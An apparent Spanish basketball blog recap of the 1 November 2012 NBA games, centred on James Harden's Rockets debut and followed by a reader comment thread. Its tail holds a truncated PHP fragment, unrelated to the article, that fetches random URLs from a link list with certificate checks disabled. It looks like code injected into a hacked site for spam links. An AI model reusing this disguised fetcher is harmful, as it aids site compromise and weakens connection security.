La Crónica: El hombre de los 80 millones de dólares

01 de November de 2012 por MagicJohnson32

James HardenEn una noche en la que debutaron de manera brillante Anthony Davis y Damian Lillard, en la que los Lakers volvieron a caer y perdieron a Steve Nash por lesión, en la que Grizzlies y Clippers revivieron sus batallas de los pasados Playoffs… la gran historia no fue ninguna de las anteriores, sino James Harden. Los focos estaban sobre el hombre de los 80 millones de dólares, que se estrenaba como jugador de los Rockets apenas unos días después de ser traspasado y unas horas después de firmar su megacontrato. Y Harden deslumbró.

Sí, se trata de un simple partido, y sí, fue ante unos Pistons que no destacan por su competitividad ni su fiereza defensiva, pero la actuación de Harden está a la altura de unos pocos elegidos: 37 puntos, 12 asistencias, 6 rebotes, 4 robos y un liderazgo incuestionable en la victoria a domicilio (105-96) de unos Rockets que, al fin, encuentran motivos más que fundados para la celebración. La guida la pusieron el notable partido de Jeremy Lin y la solidez de Omer Asik en la pintura.

En el extremo opuesto se hallan los Lakers, que tras su tropezón inicial ante Dallas no tenían el compromiso más adecuado en la forma de un back-to-back en Portland, donde los californianos han ganado muy pocos partidos últimamente. Tampoco sucedió anoche. La lesión de tobillo de Steve Nash hacia el final del segundo cuarto y un par de parciales liderados por Batum y Lillard decantaron un encuentro en el que los Lakers ofrecieron señales de mejoría en ataque pero se vieron incapaces en defensa (106-116). Damian Lillard se estrenó en la NBA con 23 puntos y 11 asistencias, algo que solo Oscar Robertson e Isiah Thomas habían logrado antes. Víctor Claver, por cierto, no abandonó el banquillo.

El gran rival de Lillard para el ROY, ya lo sabíamos, será Anthony Davis, que dio la cara ante un magnífico Tim Duncan en la victoria de los spurs (99-95). Los 24 puntos, 11 rebotes, 3 asistencias y 3 tapones de Duncan encontraron réplica en los 21-7 de Davis, que fue el mejor de unos Hornets esperanzadores pese a no contar con Eric Gordon. El primer game winner de la temporada lo firmó George Hill en Toronto (90-88) con una ‘bomba’ a 2,1 segundos para el final que sirvió para hacer buenas la sensacional segunda mitad que realizó David West y la labor de Paul George y Hibbert bajo los aros. Los Raptors desperdicieron una renta de 10 puntos a menos de 6 minutos para el final, pero pueden quedarse con el gran partido de Lowry (21 puntos, 8 asistencias, 7 rebotes, 5 robos), el doble-doble de Valanciunas y la aportación de José Manuel Calderón desde el banco.

La reedición de la eliminatoria entre Grizzlies y Clippers resultó, como aquel séptimo partido, en una caótica victoria de los angelinos (92-101). Jamal Crawford presentó credenciales como candidato a mejor sexto hombre con 29 puntos, y lideró así un banquillo determinante, con un excelente Bledsoe. Gay y Gasol sostuvieron a los Grizzlies, pero al final, como de costumbre, Chris Paul tomó las riendas y decidió. Sorprendió ver a Warriors y Suns combatir en el barro, con porcentajes de pena y victoria de Golden State pese al 4 de 30 en tiros que sumaron entre Stephen Curry y David Lee. Scola y Dragic hicieron su parte, pero no fue suficiente frente al trabajo de Landry y los puntos de Thompson y Rush (87-85). Tampoco fue bonito lo de Nuggets y Sixers. El morbo de la primera visita de Iguodala a Philly no compensó un partido malo, en el que Spencer Hawes fue el mejor de largo y lideró la victoria local (75-84). En ausencia de Bynum y pese a la marcha de Iguodala y Brand, los Sixers conservan el espíritu del año pasado, mientras que George Karl echó en falta a Gallinari y todavía tiene que aclarar sus rotaciones.

En Salt Lake City, los Mavs volvieron a la tierra con una clara derrota ante unos Jazz que ofrecieron una buena impresión (94-113). A la ya sabida rotación interior de Utah se le sumó el acierto exterior de Foye y los dos Williams, Mo y Marvin. Brandan Wright y Collison fueron de lo poco salvable entre los texanos. Por último, la eficacia de Joakim Noah sobró a los Bulls en su victoria en Sacramento. Tyreke Evans dejó una muy buena imagen pero el resto de los Kings se mostraron demasiado erráticos (87-93).

DwightPREMIOS

MVP: Nadie hizo sombra a James Harden. Ya hemos mencionado sus números, absolutamente estelares en un debut que será recordado en Houston durante muchos años. Sam Presti se debe de haber levantado hoy con un fuerte dolor de cabeza (tras haber pasado la noche golpeándosela contra la pared).

Rookie: Anthony Davis tuvo un estreno dignísimo pero el premio va para Damian Lillard. El base de los Blazers estuvo excelente ante los Lakers. Su dudosa selección de tiro en varias ocasiones y algunas pérdidas de más no empañan una actuación que no hace más que anunciar una carrera brillante en la NBA.

Sorpresa: Los 4 tapones de Lamar Odom. Cualquiera que haya visto el sobrepeso de LO debe compartir nuestra sorpresa.

Decepción: Si James Harden hizo justicia a su nuevo contrato, no se puede decir lo mismo de Stephen Curry y DeMar DeRozan. Con contratos acabados de firmar bajo el brazo, Curry realizó uno de sus peores partidos como profesional, con 5 puntos (2 de 14 en tiros), 3 asistencias y 4 pérdidas, mientras que DeRozan se quedó en 10 puntos con 5 de 14 en tiros y poco más.

Esfuerzo en vano: De entre los perdedores hay que destacar los 63 puntos, 20 rebotes y 8 asistencias logrados entre Bryant y Howard. La pareja Gay & Marc Gasol también brilló para los Grizzlies, y Kyle Lowry estuvo más que notable en la derrota de los Raptors.

Imágenes | AP Photos / Getty Images

Comenta

20 comentarios a esta entrada

  1. nba dice:
    #1

    Parece que se concreta tras los visto en este partido que Pau va a tener menos protagonismo en ataque, pues que salga del banquillo, es que sino no va haber manera de ganar un partido.Buenas notcias con los FT de Howard, algo logico por otra parte despues de las collejas de ayer.Lo de las perdidas tiene sentido ya que con el nuevo esquema se intenta mas mover el balon que el año pasado, lo que logicamente causa perdidas , cosa que con el tiempo se solucionara, pero lo de la defensa eso si que no tiene justificacion , estamos en el segundo partido de la liga y ya andan por 40 min por partido los titulares, a este paso …, conque jugasen 30 minutos deberia sobrar para ganar la mayoria de los partidos si actuasen con compromiso en defensa, pero esta visto que no va a ser asi .
    Lillard y Hickson confirmando las sensaciones previas y Claver calentando banquillo, hubiese tenido gracia que hubiese jugado y se marcase un partidazo, pero me da a mi que lo guardaran contra rivales menores.
    De Harden yo creo que buena tarjeta de presentacion, conque promedie un 20-5-5 ya estaria bien, un poquito mas de Donatas y de Terrence estaria bien para poder subir puestos en el Oeste, solo con los jugadores exteriores en el Oeste no se puede hacer nada, a ver que hacen cuando llegue Utah.

      Citar

  2. Esteban dice:
    #2

    Los kings deben estar golpeandose la cabeza al elegir a robinson y dejar pasar a lillard, con lo bien q les vendria un base y lo poco que necesitan un ala pivote

    Reconstruccion inmediata en portland, cuando leonard pueda ser el centro titular del equipo, ya sera un duro equipo de PO denuevo

    Alguna mencion merecen los 15 rebotes de Paul George, q salta a la pista en la posicion de escolta!!!
    Si tuviera algun movimiento de poste, con ese fisico, agilidad y fuerza, puede ser un ala pivote abierto all-star, lo veo un diamante en bruto q de pulirse, podria ser un kevin garnett

      Citar

  3. gabriel dice:
    #3

    yo lo que no entiendo de los Lakers es que empiecen jugando a una cosa, nos guste mas o menos y acaben jugando a otra cosa completamente distinta
    pasan de jugar un sistema de ataque muy marcado en la primera parte a jugar un desmadre absoluto en la segunda, con Artest ordenando jugadas, Kobe haciendo la guerra por su cuenta…
    si de verdad crees en este sistema lo tendrás que mantener todo el partido y hasta que salga bien o renunciar a el definitivamente pero no tiene lógica el cambio que se ha visto en estos dos partidos en la segunda parte

    al fin y al cabo el problema anoche no estaba en el ataque sino en la defensa

      Citar

  4. jose_dantley dice:
    #4

    Esteban, los Kings y todos los demás excepto New Orleans se arrepienten ahora. Habrá que ver qué dan Beal, Robinson, Harrison y Waiters, pero si rehiciéramos el draft hoy, el vuelco sería monumental.

    Fue noche de confirmaciones, la de Harden por encima, pero también las de Batum, Lowry, Paul George o el mismísimo Dwight Howard.

      Citar

  5. Sancho88 dice:
    #5

    Pues yo estoy muy satisfecho del pick de Thomas Robinson. Ese chaval va a triunfar. Estoy segurísimo. Y los Kings tenían que draftearlo, porque backourt ya tenían de sobra, no les hacía falta Lillard

      Citar

  6. Denise dice:
    #6

    nba:
    Parece que se concreta tras los visto en este partido que Pau va a tener menos protagonismo en ataque, pues que salga del banquillo, es que sino no va haber manera de ganar un partido.Buenas notcias con los FT de Howard, algo logico por otra parte despues de las collejas de ayer.Lo de las perdidas tiene sentido ya que con el nuevo esquema se intenta mas mover el balon que el año pasado, lo que logicamente causa perdidas , cosa que con el tiempo se solucionara, pero lo de la defensa eso si que no tiene justificacion , estamos en el segundo partido de la liga y ya andan por 40 min por partido los titulares, a este paso …, conque jugasen 30 minutos deberia sobrar para ganar la mayoria de los partidos si actuasen con compromiso en defensa, pero esta visto que no va a ser asi .

    Para nada de acuerdo con que Gasol tiene menos protagonismo, joder ha jugado 40 minutos en los 2 choques; esta promediando 17 tiros, está casi en un 20-10. Yo esperaba menos protagonismo del catalán entendiendo como tal que jugaría menos y haría series de 6-11 en tiros de campo y cosas así.
    Y que crack es Howard, ayer con solo 15 tiros de campo y con un % decente en libres, se va por encima de los 30. Creo que es hora de que DH sea la primera referencia en el ataque angelino y que metan mas balones dentro.
    Sobre las 2 derrotas, creo que no se le puede reprochar mucho a los jugadores, sobre todo a sus estrellas, pero Brown aun no sabe como meter a Nash en la dinámica del equipo, lo está como ninguneando; y otra cagada es como gestiona al banquillo, dandole 5 minutos de mierda al pobre de Meeks; y sin darle continuidad a Jamison ni a Hill, que los pocos minutos que juega, los hace muy bien.

    Y por cierto, Goudelock me parecia un jugador muy aprovechable, mas que Darius Morris. Para mi un error de Lakers, Yo lo ficharia para los Magic.

      Citar

  7. R1Molano dice:
    #7

    Si queréis leer mas sobre la victoria de GSW seguir el link de mi nick.

    Vaya partidito de Harden puff

      Citar

  8. nach dice:
    #8

    Yo me pregunto: a Nash tiene que meterlo en la dinámica?

    Voy a citar el fútbol por primera y última vez: hubo hace años un entrenador del Celta que, viendo a los jugadores que tenía (Mostovoi,Karpin,G.López), les decía en sus propias palabras: Salid y jugad, como única instrucción. Cuando manejas cierto tipo de jugadores, y Nash lo es, que el entrenador tenga que forzar su presencia en el equipo sobra mucho, ponlo en el campo, que le den el balón y ya funcionará todo desde ahí, pero tener que meter a Nash con calzador…

      Citar

  9. Chipi dice:
    #9

    No se trata de meter a Nash con calzador, sino de no anularlo, de no estropearlo todo haciéndole jugar de un modo que no es el suyo. Ni sistema Princeton ni gaitas. Tienes a Howard que es una bestia parda dominante. Y a Nash, Kobe y Pau, que entre los tres tienen mayor IQ que muchas plantillas enteras, y te lo cargas todo con sistemas que no entiende ni cristo. Esto lo ve todo el mundo menos Brown. Es como si tienes a uno de los mejores guitarristas del mundo y le pones a tocar la batería.

      Citar

  10. Esteban dice:
    #10

    Sancho88: y todos los demás excepto New Orleans se arrepienten ahora. Habrá que ver qué dan Beal, Robinson, Harrison y Waiters, pero si rehiciéramos el draft hoy, el vuelco sería monumenta

    te parece? tan buenos son thomas y brooks? tengo mis dudas

    mas alla de waiters, que me sorprendio, los cavs no necesitaban a lillard por irving y los wizards por wall, MKG esta muy verde pero no es sera menos que lillard
    el unico pick sin justifiacion alguna superior a lillard es el de robinson

      Citar

  11. Sancho88 dice:
    #11

    Hostias… juraría que ese comentario no era mío, jajja, pero bueno….

    Y Robinson es mi putita, no blasfemieis de su persona

      Citar

  12. Melo15 dice:
    #12

    Hombre Esteban lo que estaba claro esque a los Kings nomles hacia falta un base, yo creo que Thomas Robinson es una buena opcion pero le tienen que dar minutos y confianza.
    Fatal los Lakers aver si mejoran porque con este equipazo no pueden quedar mas abajo de 3.
    PD:Vaya partido de Crawfor robazo mio en la 10 ronda!

      Citar

  13. Esteban dice:
    #13

    bueno yo creo que lillard seria titular indiscutido en estos kings, mientras que robinson salta de la banca y no rindio de gran forma en lo q va de la pretemporada

      Citar

  14. Esteban dice:
    #14

    este arranque de brown es casi irremontable, 10 partidos perdidos, con la carga de la temporada pasada, no lo va a superar, deberia ganar n10 partidos seguidos para que no lo echen

    los lakers deben ganar tiempo y sacarselo de encima rapido, de nada sirve estirar la agonia

      Citar

  15. Esteban dice:
    #15

    q cerrador de juegos que es CP3 madre, en menphis sera declarado persona noi grata, quiza si no lo dejan entrar a la ciudad, logran que no les gane todos los finales cerrados jeje

      Citar

  16. Sancho88 dice:
    #16

    Siempre oportunista Esteban, siento decírtelo, pero siempre esperas a que alguien la cague o lo haga muy bien para mandarlo al infierno o viceversa. No me vale tu argumento. Sabes de sobra las capacidades de Thomas Robinson. De hecho, los Kings dejaron pasar un trade por Kyle Lowry y las rondas de Houston a cambio del pick 5 y Tyreke, y creo que no se equivocaron, de veras. En condiciones normales, T-Rob debería estar en el quinteto de rookies y hacer una temporada rookie de más de 10-5 de sobra

      Citar

  17. nba dice:
    #17

    Alguien sabe si se puede conseguir un transplante del IQ de Duncan, porque es pa fliparse .
    A mas de uno en la liga le vendria bien .

      Citar

  18. Laker1624 dice:
    #18

    Buenas

    Uno de los equipos que mejor sensaciones me ha dejado despues de su debut son los Bulls, me parece que si juegan al nivel del primer partdio no lo van a pasar tan mal sin Rose como podia parecer en un principio. Creo que si consiguen mantenerse arriba en el Este hasta el regreso de Rose (si vuelve esta temporada) podrian pasar a ser serios aspirantes al titulo, siempre y cuando Rose vuelva al nivel de los dos ultimos años.

    En cuanto al partido de esta pasada madrugada entre Spurs y Thunder decir que por parte de Oklahoma me quedo con Durant y poco mas. El juego interior de los Thunder me ha parecido muy pobre, y aunque pienso que por cualidades y potencial ofensivo no se debe esperar mucho de sus hombres grandes, aun deberian rendir algo mas. El partido de Westbrook tampoco lo salvo, malos porcentajes de tiro y mala direccion de juego en mi opinion. Aparte del ya mencionado Durant tambien me quedo con Kevin Martin, aunque no rinda al nivel de Harden creo que puede ofrecer mucho a este equipo saliendo desde el banquillo. Por parte de los Spurs decir que aunque a lo mejor es pronto para emitir veredictos los veo entre los primeros cuatro del Oeste.

    PD:Cuando veo a Duncan me parece que es un jugadorazo eterno.

      Citar

  19. Esteban dice:
    #19

    Sancho88: que alguien la cague o lo haga muy bien para mandarlo al infierno o viceversa. No me vale tu argumento. Sabes de sobra las capacidades de Thomas Robinson. De hecho, los Kings dejaron pasar un trade por Kyle Lowry y las rondas de Houston a cambio del pick 5 y Tyreke, y creo que no se equivocaron, de veras. En condiciones normales, T-Rob debería estar en el quinteto de rookies y hacer una temporada rookie de más de 10-5 de sobra

    sancho88, no cierto lo que dices, yo he hablado maravillas de thomas robinson y nunca se me cruzo por la cabeza que lillard podria ser un pick superior a el, pero a la luz de los hechos, creo que queda claro que le hubiese venido mejor a los kings que robinson

    nunca dije, YO LES AVISE, LILLARD ES MAS QUE ROBINSON

    solo digo que de haber sido mas agudos en el scounting y hubiesen notado la capacidad de lillard, los kings serian hoy mismo mucho mas de lo que son con robinson

      Citar

  20. Sancho88 dice:
    #20

    Claro, pero es que resulta que las loterías son a veces eso, puras loterías. TB Isaiah Thomas salió en el pick 60, te recuerdo… y me puedes asegurar que Lillard es mejor jugador que Thomas? Tengo mis serias dudas. No todo son cagadas de Petrie, que reconozco que alguna manga de vez en cuando, pero últimamente está haciendo las cosas con cabeza

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>